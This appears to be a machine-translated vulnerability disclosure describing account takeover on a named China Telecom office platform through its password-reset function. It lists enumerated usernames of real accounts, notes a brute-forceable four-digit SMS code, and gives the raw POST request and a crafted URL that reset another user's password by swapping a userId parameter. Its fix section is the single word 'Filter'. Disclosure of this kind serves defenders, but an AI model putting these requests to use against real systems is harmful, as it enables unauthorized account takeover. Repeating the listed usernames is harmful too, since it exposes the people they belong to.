Reset the password of any account on China Telecom Integrated Office Platform
Http://office.189.cn/office automation-V3.0.0
Http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question! Input. do password retrieval
Enter a user name that can be enumerated for the Logon account. Several accounts are provided here.
cuichundandonggaoguanhuajuanleililinqiruitaoyangzhangzhenzhengalaoaminane
Take tao as an example. Retrieve the mobile phone verification code and obtain it. The verification code contains four digits that can be cracked.
This is one. Let's take a look at the password change request.
POST /ioop-bcs-web/sys/sys-pwd-question!check.do HTTP/1.1Host: office.189.cnProxy-Connection: keep-aliveContent-Length: 87Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://office.189.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.doAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: userId=ff808081452c2fcc0147246ebabf1d20&step=4&password=wooyuntest&password2=wooyuntest
At first glance, there is no Token, that is, as long as we get the userId parameter, we can reset any account password.
As for how to obtain it, let's go back to the last few steps. Please enter the Logon account password retrieval and return the userId parameter corresponding to the retrieved current account.
For example, retrieve the Account "yang" and get the userId: 402835d03f2446d6013f4039d6ae4491.
Construct the following post:
http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.douserId=402835d03f2446d6013f4039d6ae4491&step=4&password=wooyuntest&password2=wooyuntest
Yang: wooyuntest
The test result shows that admin is a system administrator account. To avoid this problem, you will not perform any operations. Otherwise, you will have a higher permission.
Solution:
Filter